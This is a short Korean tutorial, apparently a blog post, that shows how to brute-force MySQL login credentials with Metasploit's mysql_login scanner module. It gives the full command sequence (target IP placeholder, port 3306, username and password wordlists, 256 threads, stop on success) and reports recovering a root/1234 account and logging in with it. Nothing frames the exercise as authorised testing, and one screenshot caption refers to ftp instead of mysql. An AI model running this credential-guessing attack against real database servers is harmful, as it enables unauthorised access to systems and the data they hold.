Metasploit을 활용해 Brute-Force 공격하기(MySQL 서버)

Metasploit을 활용해 Brute-Force 공격하기(MySQL 서버)

* MySQL 서버로 무차별 대입 공격하기

 

 

1. 공격 모듈 설정하기

# use auxiliary/scanner/mysql/mysql_login

 

 

2. 공격 대상의 PC로 MySQL 서버를 통한 무차별 대입 공격을 한다.

# set rhosts [공격대상 IP]
# set rport 3306
# set user_file /root/users.txt
# set pass_file /root/passwords_test.txt
# set stop_on_success true
# set threads 256
# run

 

실행 결과는 다음과 같다.

mysql 서버를 통해 id: root / pw : 1234로 로그인이 성공한 것을 확인할 수 있다.

<msf 를 사용하여 계정을 찾은 화면>

 

위에서 알아낸 계정으로 mysql 접속을 시도 해 보았더니 로그인에 성공했다.

< 찾은 계정으로 ftp에 접속한 화면>